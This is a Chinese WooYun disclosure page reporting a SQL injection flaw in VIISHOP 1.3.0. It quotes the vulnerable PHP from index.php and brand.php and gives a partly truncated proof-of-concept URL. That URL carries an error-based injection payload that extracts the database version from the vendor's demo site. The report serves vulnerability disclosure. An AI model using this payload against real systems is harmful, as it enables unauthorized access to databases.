当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021365

漏洞标题:VIISHOP 1.3.0 SQL Injection Vulnerability

相关厂商:VIISHOP

漏洞作者: knife

提交时间:2013-04-08 10:42

修复时间:2013-05-23 10:43

公开时间:2013-05-23 10:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

问题挺严重的

详细说明:

/*******************************************************/
/* VIISHOP 1.3.0 SQL Injection Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
/* Welcome to http://www.90sec.com */
/*******************************************************/
//index.php 首页文件

//index.php 首页文件
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
                                $GLOBALS['_REQUEST']['p'] = "index";
}
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  //包含 进行了过滤 查看system目录下文件
{
                                show_msg( "error_once", "index.php" );
}


问题出在brand.php文件中

$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) );  //$prefix 和 $brand_id 未初始化没有进行任何过滤就带入查询了


poc: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

漏洞证明:

1304031410d2545245b56014b7.jpg

修复方案:

:) 推荐80sec 的防注入代码 哈哈哈哈

版权声明:转载请注明来源 knife@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论